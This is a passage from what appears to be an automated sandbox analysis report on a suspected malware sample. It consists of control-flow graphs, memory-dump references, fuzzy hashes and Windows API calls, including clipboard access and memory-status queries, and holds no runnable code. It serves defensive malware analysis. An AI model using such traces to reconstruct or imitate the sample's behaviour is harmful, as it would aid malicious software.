104->110 111 6d53798-6d5379e 104->111 107 6d53777 105->107 108 6d53779-6d5377b 105->108 106->100 107->104 108->104 115 6d537d2-6d53823 110->115 116 6d537bc-6d537c2 110->116 112 6d537a0 111->112 113 6d537a2-6d537a4 111->113 112->110 113->110 115->85 117 6d537c4 116->117 118 6d537c6-6d537c8 116->118 117->115 118->115 126->19 127->19
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-3723351465
                                                                    • Opcode ID: e4f6fd880f74e144c2972ae57df01e10e1ffbec8301d7296958f77bf26d74018
                                                                    • Instruction ID: 299a11c5024669cd4c06f319a763f0e19c377a8ab28991bcaadd542bb3f1858d
                                                                    • Opcode Fuzzy Hash: e4f6fd880f74e144c2972ae57df01e10e1ffbec8301d7296958f77bf26d74018
                                                                    • Instruction Fuzzy Hash: 38323D31E1061ACBCB14DF79D89459DB7B2FFC9340F21C6AAD449A7264EB30AD85CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    control_flow_graph 668 6d57d60-6d57d7e 669 6d57d80-6d57d83 668->669 670 6d57d85-6d57da1 669->670 671 6d57da6-6d57da9 669->671 670->671 672 6d57dc0-6d57dc3 671->672 673 6d57dab-6d57db9 671->673 674 6d57dc5-6d57ddf 672->674 675 6d57de4-6d57de7 672->675 680 6d57e06-6d57e1c 673->680 681 6d57dbb 673->681 674->675 677 6d57df4-6d57df6 675->677 678 6d57de9-6d57df3 675->678 684 6d57dfd-6d57e00 677->684 685 6d57df8 677->685 688 6d58037-6d58041 680->688 689 6d57e22-6d57e2b 680->689 681->672 684->669 684->680 685->684 690 6d57e31-6d57e4e 689->690 691 6d58042-6d58077 689->691 700 6d58024-6d58031 690->700 701 6d57e54-6d57e7c 690->701 694 6d58079-6d5807c 691->694 696 6d5809f-6d580a2 694->696 697 6d5807e-6d5809a 694->697 698 6d582d7-6d582da 696->698 699 6d580a8-6d580b7 696->699 697->696 703 6d58385-6d58387 698->703 704 6d582e0-6d582ec 698->704 711 6d580d6-6d5811a 699->711 712 6d580b9-6d580d4 699->712 700->688 700->689 701->700 723 6d57e82-6d57e8b 701->723 706 6d5838e-6d58391 703->706 707 6d58389 703->707 710 6d582f7-6d582f9 704->710 706->694 713 6d58397-6d583a0 706->713 707->706 714 6d58311-6d58315 710->714 715 6d582fb-6d58301 710->715 725 6d58120-6d58131 711->725 726 6d582ab-6d582c1 711->726 712->711 719 6d58317-6d58321 714->719 720 6d58323 714->720 717 6d58305-6d58307 715->717 718 6d58303 715->718 717->714 718->714 724 6d58328-6d5832a 719->724 720->724 723->691 727 6d57e91-6d57ead 723->727 728 6d5832c-6d5832f 724->728 729 6d5833b-6d58374 724->729 735 6d58137-6d58154 725->735 736 6d58296-6d582a5 725->736 726->698 737 6d57eb3-6d57edd 727->737 738 6d58012-6d5801e 727->738 728->713 729->699 750 6d5837a-6d58384 729->750 735->736 747 6d5815a-6d58250 call 6d56578 735->747 736->725 736->726 752 6d57ee3-6d57f0b 737->752 753 6d58008-6d5800d 737->753 738->700 738->723 801 6d58252-6d5825c 747->801 802 6d5825e 747->802 752->753 759 6d57f11-6d57f3f 752->759 753->738 759->753 765 6d57f45-6d57f4e 759->765 765->753 766 6d57f54-6d57f86 765->766 774 6d57f91-6d57fad 766->774 775 6d57f88-6d57f8c 766->775 774->738 777 6d57faf-6d58006 call 6d56578 774->777 775->753 776 6d57f8e 775->776 776->774 777->738 803 6d58263-6d58265 801->803 802->803 803->736 804 6d58267-6d5826c 803->804 805 6d5826e-6d58278 804->805 806 6d5827a 804->806 807 6d5827f-6d58281 805->807 806->807 807->736 808 6d58283-6d5828f 807->808 808->736
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q
                                                                    • API String ID: 0-127220927
                                                                    • Opcode ID: dc4ad9b7f0a86a69bbf991b8d98c06f2c78b1602a6309943bdbcb1a53b72c8a1
                                                                    • Instruction ID: c7b2c5f84dcc2e159a96a05d1e422e03bd846b934988b17fcb45b0857a3e8e31
                                                                    • Opcode Fuzzy Hash: dc4ad9b7f0a86a69bbf991b8d98c06f2c78b1602a6309943bdbcb1a53b72c8a1
                                                                    • Instruction Fuzzy Hash: 81028C30B002159FDF58DF69D990AAEB7E2FF84214F158529D806DB790DB39EC86CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f115f1929d1d80b1d8df7b7f8b5b4370c1e72a7dd31669b2037bfaa193e63d41
                                                                    • Instruction ID: 3bab66e2d9caea911434ca174ab8fab9b0ddeddc2a0d3e78072656791a0fd6ee
                                                                    • Opcode Fuzzy Hash: f115f1929d1d80b1d8df7b7f8b5b4370c1e72a7dd31669b2037bfaa193e63d41
                                                                    • Instruction Fuzzy Hash: FC925734A002048FDB64DF68C584A9DBBF2FF48314F5684A9D809DB765DB35ED89CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9890c496549d916508a47276043bc5c44be65ceb47983804c73be7f4c6d08666
                                                                    • Instruction ID: 8a1ba4b6bfc7cd5fecf6c101329115a1a871aacf8444d295aeb37ed8abe31178
                                                                    • Opcode Fuzzy Hash: 9890c496549d916508a47276043bc5c44be65ceb47983804c73be7f4c6d08666
                                                                    • Instruction Fuzzy Hash: F362BF34B002448FDF54DB68D590AADB7F2EF84354F668469E806DB7A0DB39EC46CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7460a642cc77a6115b24ebca2e8ce2d5f5dc5720913a25c6c40a9a796ae015fc
                                                                    • Instruction ID: d4a5fd38983a14689b3c7362dbfb283a2730255d51b6f812c43cf5cd08d947e7
                                                                    • Opcode Fuzzy Hash: 7460a642cc77a6115b24ebca2e8ce2d5f5dc5720913a25c6c40a9a796ae015fc
                                                                    • Instruction Fuzzy Hash: 8E328D34B102098FDF54DB68D890BAEB7B6EF88314F118529E805EB754DB39EC46CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0e62d6f01b18687379a06baa921470156dcb67890f292520f0d34d0c8cd40d24
                                                                    • Instruction ID: 7b57a2622e3cca581d8555a067ba2b2d2800e69c9598e1db4f37c5d2913e489c
                                                                    • Opcode Fuzzy Hash: 0e62d6f01b18687379a06baa921470156dcb67890f292520f0d34d0c8cd40d24
                                                                    • Instruction Fuzzy Hash: 3B227370E102098FDF64CB69D5A07ADB7B6EF85314F218826D819EB791CB38DC85CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2f16ca3aa06bbd118d884e3212735d1b5c1f58478022b1881f8cfd82f83342f8
                                                                    • Instruction ID: 2a885b1855619fceaa41400652c0095d1cd36fd54fec3940ec47037502feeb96
                                                                    • Opcode Fuzzy Hash: 2f16ca3aa06bbd118d884e3212735d1b5c1f58478022b1881f8cfd82f83342f8
                                                                    • Instruction Fuzzy Hash: B412D235F002159BDF65DBA4E8806AEBBB2FF85310F258569D84ADB740DB38DC42CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 128 6d59130-6d59155 129 6d59157-6d5915a 128->129 130 6d59160-6d59175 129->130 131 6d59a18-6d59a1b 129->131 139 6d59177-6d5917d 130->139 140 6d5918d-6d591b0 130->140 132 6d59a41-6d59a43 131->132 133 6d59a1d-6d59a3c 131->133 134 6d59a45 132->134 135 6d59a4a-6d59a4d 132->135 133->132 134->135 135->129 137 6d59a53-6d59a5d 135->137 141 6d59181-6d59183 139->141 142 6d5917f 139->142 146 6d591b2-6d591b7 140->146 147 6d591c8-6d5922d 140->147 141->140 142->140 148 6d5922e-6d59239 146->148 149 6d591b8 146->149 147->148 154 6d59265-6d59281 148->154 155 6d5923b-6d5925e 148->155 151 6d591bc-6d591be 149->151 152 6d591b9-6d591ba 149->152 151->147 152->147 163 6d59283-6d592a6 154->163 164 6d592ad-6d592c8 154->164 155->154 163->164 171 6d592f3-6d5930e 164->171 172 6d592ca-6d592ec 164->172 178 6d59310-6d5932c 171->178 179 6d59333-6d59341 171->179 172->171 178->179 180 6d59351-6d593cb 179->180 181 6d59343-6d5934c 179->181 187 6d593cd-6d593eb 180->187 188 6d59418-6d5942d 180->188 181->137 192 6d59407-6d59416 187->192 193 6d593ed-6d593fc 187->193 188->131 192->187 192->188 193->192
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q
                                                                    • API String ID: 0-858218434
                                                                    • Opcode ID: 85e1f8430bcb9d987f363ad4c546353bdd5d59cc0623b01bf378627c936258a8
                                                                    • Instruction ID: c46263af2a59d9a1491341e7cac21d58a83ac829c11402e10447994eb47a819c
                                                                    • Opcode Fuzzy Hash: 85e1f8430bcb9d987f363ad4c546353bdd5d59cc0623b01bf378627c936258a8
                                                                    • Instruction Fuzzy Hash: 68914F30B4021A9FDB94DF69D960BAEB3F6FFC4244F118469C809EB744EE749C468B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 196 6d5cf30-6d5cf4b 197 6d5cf4d-6d5cf50 196->197 198 6d5cf52-6d5cf94 197->198 199 6d5cf99-6d5cf9c 197->199 198->199 200 6d5cfe5-6d5cfe8 199->200 201 6d5cf9e-6d5cfe0 199->201 203 6d5d031-6d5d034 200->203 204 6d5cfea-6d5d02c 200->204 201->200 205 6d5d057-6d5d05a 203->205 206 6d5d036-6d5d052 203->206 204->203 209 6d5d0a3-6d5d0a6 205->209 210 6d5d05c-6d5d09e 205->210 206->205 214 6d5d0c3-6d5d0c6 209->214 215 6d5d0a8-6d5d0be 209->215 210->209 217 6d5d10f-6d5d112 214->217 218 6d5d0c8-6d5d10a 214->218 215->214 224 6d5d114-6d5d116 217->224 225 6d5d121-6d5d124 217->225 218->217 227 6d5d415 224->227 228 6d5d11c 224->228 229 6d5d126-6d5d168 225->229 230 6d5d16d-6d5d170 225->230 238 6d5d418-6d5d424 227->238 228->225 229->230 235 6d5d172-6d5d1b4 230->235 236 6d5d1b9-6d5d1bc 230->236 235->236 242 6d5d1c6-6d5d1c9 236->242 243 6d5d1be-6d5d1c3 236->243 245 6d5d27a-6d5d289 238->245 246 6d5d42a-6d5d717 238->246 248 6d5d212-6d5d215 242->248 249 6d5d1cb-6d5d20d 242->249 243->242 252 6d5d298-6d5d2a4 245->252 253 6d5d28b-6d5d290 245->253 408 6d5d71d-6d5d723 246->408 409 6d5d93e-6d5d948 246->409 254 6d5d217-6d5d226 248->254 255 6d5d25e-6d5d261 248->255 249->248 256 6d5d949-6d5d97e 252->256 257 6d5d2aa-6d5d2bc 252->257 253->252 263 6d5d235-6d5d241 254->263 264 6d5d228-6d5d22d 254->264 255->238 266 6d5d267-6d5d26a 255->266 281 6d5d980-6d5d983 256->281 277 6d5d2c1-6d5d2c3 257->277 263->256 273 6d5d247-6d5d259 263->273 264->263 274 6d5d275-6d5d278 266->274 275 6d5d26c-6d5d26e 266->275 273->255 274->245 274->277 279 6d5d270 275->279 280 6d5d2d3-6d5d2dc 275->280 285 6d5d2c5 277->285 286 6d5d2ca-6d5d2cd 277->286 279->274 289 6d5d2de-6d5d2e3 280->289 290 6d5d2eb-6d5d2f7 280->290 291 6d5d985-6d5d9a1 281->291 292 6d5d9a6-6d5d9a9 281->292 285->286 286->197 286->280 289->290 295 6d5d2fd-6d5d311 290->295 296 6d5d408-6d5d40d 290->296 291->292 293 6d5d9b8-6d5d9bb 292->293 294 6d5d9ab call 6d5da9d 292->294 301 6d5d9bd-6d5d9e9 293->301 302 6d5d9ee-6d5d9f0 293->302 305 6d5d9b1-6d5d9b3 294->305 295->227 314 6d5d317-6d5d329 295->314 296->227 301->302 307 6d5d9f7-6d5d9fa 302->307 308 6d5d9f2 302->308 305->293 307->281 313 6d5d9fc-6d5da0b 307->313 308->307 321 6d5da72-6d5da87 313->321 322 6d5da0d-6d5da70 call 6d56578 313->322 319 6d5d34d-6d5d34f 314->319 320 6d5d32b-6d5d331 314->320 329 6d5d359-6d5d365 319->329 324 6d5d335-6d5d341 320->324 325 6d5d333 320->325 322->321 328 6d5d343-6d5d34b 324->328 325->328 328->329 336 6d5d367-6d5d371 329->336 337 6d5d373 329->337 339 6d5d378-6d5d37a 336->339 337->339 339->227 342 6d5d380-6d5d39c call 6d56578 339->342 350 6d5d39e-6d5d3a3 342->350 351 6d5d3ab-6d5d3b7 342->351 350->351 351->296 354 6d5d3b9-6d5d406 351->354 354->227 410 6d5d725-6d5d72a 408->410 411 6d5d732-6d5d73b 408->411 410->411 411->256 412 6d5d741-6d5d754 411->412 414 6d5d92e-6d5d938 412->414 415 6d5d75a-6d5d760 412->415 414->408 414->409 416 6d5d762-6d5d767 415->416 417 6d5d76f-6d5d778 415->417 416->417 417->256 418 6d5d77e-6d5d79f 417->418 421 6d5d7a1-6d5d7a6 418->421 422 6d5d7ae-6d5d7b7 418->422 421->422 422->256 423 6d5d7bd-6d5d7da 422->423 423->414 426 6d5d7e0-6d5d7e6 423->426 426->256 427 6d5d7ec-6d5d805 426->427 429 6d5d921-6d5d928 427->429 430 6d5d80b-6d5d832 427->430 429->414 429->426 430->256 433 6d5d838-6d5d842 430->433 433->256 434 6d5d848-6d5d85f 433->434 436 6d5d861-6d5d86c 434->436 437 6d5d86e-6d5d889 434->437 436->437 437->429 442 6d5d88f-6d5d8a8 call 6d56578 437->442 446 6d5d8b7-6d5d8c0 442->446 447 6d5d8aa-6d5d8af 442->447 446->256 448 6d5d8c6-6d5d91a 446->448 447->446 448->429
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q
                                                                    • API String ID: 0-182748909
                                                                    • Opcode ID: e0944e0570561b5ff9c1ad18c641136e0cba21f812eeb191718395b46c4930ca
                                                                    • Instruction ID: 2f1b2865db5b9cdceac3928cd95a80ebf9a788a464d14d69bf3ae29e017f9dee
                                                                    • Opcode Fuzzy Hash: e0944e0570561b5ff9c1ad18c641136e0cba21f812eeb191718395b46c4930ca
                                                                    • Instruction Fuzzy Hash: A0627E30A0020A8FCB55EF69E580A5DB7F7FF84304B218928D4099F769DB79EC46CB95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 456 6d54b78-6d54b9c 457 6d54b9e-6d54ba1 456->457 458 6d54ba3-6d54bbd 457->458 459 6d54bc2-6d54bc5 457->459 458->459 460 6d552a4-6d552a6 459->460 461 6d54bcb-6d54cc3 459->461 463 6d552ad-6d552b0 460->463 464 6d552a8 460->464 479 6d54d46-6d54d4d 461->479 480 6d54cc9-6d54d16 call 6d55421 461->480 463->457 466 6d552b6-6d552c3 463->466 464->463 481 6d54dd1-6d54dda 479->481 482 6d54d53-6d54dc3 479->482 493 6d54d1c-6d54d38 480->493 481->466 499 6d54dc5 482->499 500 6d54dce 482->500 496 6d54d43 493->496 497 6d54d3a 493->497 496->479 497->496 499->500 500->481
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: fbq$XPbq$\Obq
                                                                    • API String ID: 0-4057264190
                                                                    • Opcode ID: 19c102297fa28049a2d62d7cc556565770028161337d24921dc923cfa44dadba
                                                                    • Instruction ID: 80f4aac3a9f915315893e25bd34ce6efc548769e73b2983b35fe64c16d4f5682
                                                                    • Opcode Fuzzy Hash: 19c102297fa28049a2d62d7cc556565770028161337d24921dc923cfa44dadba
                                                                    • Instruction Fuzzy Hash: 5C617230F002199FEF549FA9D8547AEBAF6FFC8710F208429D50AEB394DA758C418B95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 924 6d5911f-6d59124 926 6d59185-6d59187 924->926 927 6d59126-6d59155 924->927 928 6d59171-6d59175 926->928 929 6d59189 926->929 933 6d59157-6d5915a 927->933 934 6d59177-6d5917d 928->934 935 6d5918d-6d591a3 928->935 931 6d5918b-6d5918c 929->931 932 6d591aa-6d591b0 929->932 931->935 938 6d591b2-6d591b7 932->938 939 6d591c8-6d5922d 932->939 940 6d59160-6d59168 933->940 941 6d59a18-6d59a1b 933->941 936 6d59181-6d59183 934->936 937 6d5917f 934->937 935->932 936->935 937->935 943 6d5922e-6d59239 938->943 944 6d591b8 938->944 939->943 940->928 945 6d59a41-6d59a43 941->945 946 6d59a1d-6d59a3c 941->946 955 6d59265-6d59281 943->955 956 6d5923b-6d5925e 943->956 950 6d591bc-6d591be 944->950 951 6d591b9-6d591ba 944->951 947 6d59a45 945->947 948 6d59a4a-6d59a4d 945->948 946->945 947->948 948->933 952 6d59a53-6d59a5d 948->952 950->939 951->939 965 6d59283-6d592a6 955->965 966 6d592ad-6d592c8 955->966 956->955 965->966 973 6d592f3-6d5930e 966->973 974 6d592ca-6d592ec 966->974 980 6d59310-6d5932c 973->980 981 6d59333-6d59341 973->981 974->973 980->981 982 6d59351-6d593cb 981->982 983 6d59343-6d5934c 981->983 989 6d593cd-6d593eb 982->989 990 6d59418-6d5942d 982->990 983->952 994 6d59407-6d59416 989->994 995 6d593ed-6d593fc 989->995 990->941 994->989 994->990 995->994
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q
                                                                    • API String ID: 0-127220927
                                                                    • Opcode ID: 6952ddfc6c57e03c92e75cd5bf0c7b98b574896df2517895226c754aa459f25f
                                                                    • Instruction ID: f4a3ff75176e218f20d2f11720689f3d9f1f391170faeec5ea6fad7d061d4271
                                                                    • Opcode Fuzzy Hash: 6952ddfc6c57e03c92e75cd5bf0c7b98b574896df2517895226c754aa459f25f
                                                                    • Instruction Fuzzy Hash: 4651CF30B002069FDF94CB79D8A0BAE73F6EFC8244F018469C80ADB784DE349C428B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 1135 6d54b68-6d54b9c 1138 6d54b9e-6d54ba1 1135->1138 1139 6d54ba3-6d54bbd 1138->1139 1140 6d54bc2-6d54bc5 1138->1140 1139->1140 1141 6d552a4-6d552a6 1140->1141 1142 6d54bcb-6d54cc3 1140->1142 1144 6d552ad-6d552b0 1141->1144 1145 6d552a8 1141->1145 1160 6d54d46-6d54d4d 1142->1160 1161 6d54cc9-6d54d16 call 6d55421 1142->1161 1144->1138 1147 6d552b6-6d552c3 1144->1147 1145->1144 1162 6d54dd1-6d54dda 1160->1162 1163 6d54d53-6d54dc3 1160->1163 1174 6d54d1c-6d54d38 1161->1174 1162->1147 1180 6d54dc5 1163->1180 1181 6d54dce 1163->1181 1177 6d54d43 1174->1177 1178 6d54d3a 1174->1178 1177->1160 1178->1177 1180->1181 1181->1162
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: fbq$XPbq
                                                                    • API String ID: 0-2292610095
                                                                    • Opcode ID: cf83d65647c3b65d44e9622804f7a3a76a5b2a6b96323402b24bc2172b8e61b3
                                                                    • Instruction ID: d3512d2843f839f7016596b285085d0be8fa0432eb69ab2609cfa2e3cac762d6
                                                                    • Opcode Fuzzy Hash: cf83d65647c3b65d44e9622804f7a3a76a5b2a6b96323402b24bc2172b8e61b3
                                                                    • Instruction Fuzzy Hash: C9519230F002099FDB549FA9C8547AEBBF6FFC8710F21852AD506EB394DA798C418B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 1222 13de978-13de993 1223 13de9bd-13de9dc call 13de578 1222->1223 1224 13de995-13de9bc 1222->1224 1229 13de9de-13de9e1 1223->1229 1230 13de9e2-13dea41 1223->1230 1237 13dea47-13dead4 GlobalMemoryStatusEx 1230->1237 1238 13dea43-13dea46 1230->1238 1242 13deadd-13deb05 1237->1242 1243 13dead6-13deadc 1237->1243 1243->1242
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4524828442.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_13d0000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f13231771941778e7da631c12f46f8191e96f5881818859289e1dbdce338f0e1
                                                                    • Instruction ID: 99de47cbd38d055a2ec360419527eecba7d32773e4f78953542073431633f1ad
                                                                    • Opcode Fuzzy Hash: f13231771941778e7da631c12f46f8191e96f5881818859289e1dbdce338f0e1
                                                                    • Instruction Fuzzy Hash: CA415532D053898FCB04DFB9D8046DEBFB5AF89310F1485AAE404A7641DB389880CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 1246 6d42593-6d425fe 1248 6d42600-6d42606 1246->1248 1249 6d42609-6d42610 1246->1249 1248->1249 1250 6d42612-6d42618 1249->1250 1251 6d4261b-6d42653 1249->1251 1250->1251 1252 6d4265b-6d426ba CreateWindowExW 1251->1252 1253 6d426c3-6d426fb 1252->1253 1254 6d426bc-6d426c2 1252->1254 1258 6d426fd-6d42700 1253->1258 1259 6d42708 1253->1259 1254->1253 1258->1259 1260 6d42709 1259->1260 1260->1260
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06D426AA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 7fad71a36a7ee3c1d31c1cc70cae45f6af5aa23a572d0e576142e081510039b7
                                                                    • Instruction ID: b026216f7496feb6ddbf1d34c4e8e41f1387ce76f9ce7b8f6636fc2141d7f15c
                                                                    • Opcode Fuzzy Hash: 7fad71a36a7ee3c1d31c1cc70cae45f6af5aa23a572d0e576142e081510039b7
                                                                    • Instruction Fuzzy Hash: A041B1B1D103499FDB14DF9AC884ADEBBB5BF48310F24812AE419AB250D775A985CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06D426AA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 415e12ed32fe8044ca3d12cc368901753666ea87f29e1522389e3acc6b8468fb
                                                                    • Instruction ID: c6b8e341ac89740149468152c720acf81dea4fcd62f98f59db13415b0d16d76d
                                                                    • Opcode Fuzzy Hash: 415e12ed32fe8044ca3d12cc368901753666ea87f29e1522389e3acc6b8468fb
                                                                    • Instruction Fuzzy Hash: 4A41BEB1D103499FDB14DF9AC884ADEBBB5BF48310F24812AE819AB250D775A985CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 06D47249
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: CallProcWindow
                                                                    • String ID:
                                                                    • API String ID: 2714655100-0
                                                                    • Opcode ID: 6614cc1dbf839d1ec58ce3d9fc3f86d2f31c92c571e581692adfc5d36a9436b9
                                                                    • Instruction ID: b4f0f10a60be704423899020f8d3c5b714f6e743559b2d7afce1935dede2214f
                                                                    • Opcode Fuzzy Hash: 6614cc1dbf839d1ec58ce3d9fc3f86d2f31c92c571e581692adfc5d36a9436b9
                                                                    • Instruction Fuzzy Hash: 5A4138B4A00349CFDB54DF99C888AAAFBF5FF88314F248459E519A7321D734A841CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard
                                                                    • String ID:
                                                                    • API String ID: 220874293-0
                                                                    • Opcode ID: 1b8e12286caf4fddbe2eca8ce62d8ad10eb76341123913df008788ae56a6e532
                                                                    • Instruction ID: dd90fa1a8cab5d628ec5f1217164f26188f3908c348e8bc36165816070d1a85e
                                                                    • Opcode Fuzzy Hash: 1b8e12286caf4fddbe2eca8ce62d8ad10eb76341123913df008788ae56a6e532
                                                                    • Instruction Fuzzy Hash: 3D3153B0D01249DFDB54DF99D984BDEBBF5EF48314F20802AE108AB390DB746945CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
